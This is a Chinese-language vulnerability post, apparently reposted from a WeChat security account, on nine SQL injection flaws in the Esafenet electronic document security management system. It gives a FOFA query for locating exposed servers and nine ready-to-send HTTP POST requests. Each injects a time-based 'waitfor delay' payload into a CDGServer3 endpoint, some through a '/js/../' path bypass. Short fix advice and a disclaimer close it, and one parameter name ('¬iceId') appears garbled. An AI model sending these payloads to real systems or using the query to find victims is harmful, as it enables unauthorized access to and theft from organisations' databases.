漏洞描述
亿赛通电子文档安全管理系统 多处 SQL注入,攻击者可通过此漏洞敏感信息。
漏洞复现
1、fofa
app="亿赛通-电子文档安全管理系统"
2、部分界面如下
3、隐患url,验证如下POC1
POST /CDGServer3/js/../OrganiseAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
command=search&groupNameSearch=-1'waitfor delay '0:0:5'--
POC-2
POST /CDGServer3/js/../MultiServerAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
command=delServer&serverId=-1'waitfor delay '0:0:5'--
POC3
POST /CDGServer3/js/../LogicGroupAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
command=isExist&logicGroupName=-1'waitfor delay '0:0:5'--
POC4
POST /CDGServer3/device/SecureUsbService;login HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
command=DelSecureUsb&id=a';WAITFOR+DELAY+'0:0:5'--
POC5
POST /CDGServer3/js/../DeviceAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
command=delSecureUsb&SecureUsbid=-1'waitfor delay '0:0:5'--
POC6
POST /CDGServer3/js/../FileFormatAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
command=delFileFormat&fileFormatId=-1'waitfor delay '0:0:5'--
POC7
POST /CDGServer3/js/../NetSecPolicyAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
command=upPriority&id=-1'waitfor delay '0:0:5'--
POC8
POST /CDGServer3/js/../NoticeAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
command=delNotice¬iceId=-1'waitfor delay '0:0:5'--
POC9
POST /CDGServer3/js/../DocInfoAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
command=JudgeHasFile&logicpath==-1'waitfor delay '0:0:5'--
修复建议
1、请联系厂商进行修复。2、如非必要,禁止公网访问该系统。3、设置白名单访问。
原文始发于微信公众号(骇客安全):亿赛通-9处SQL注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论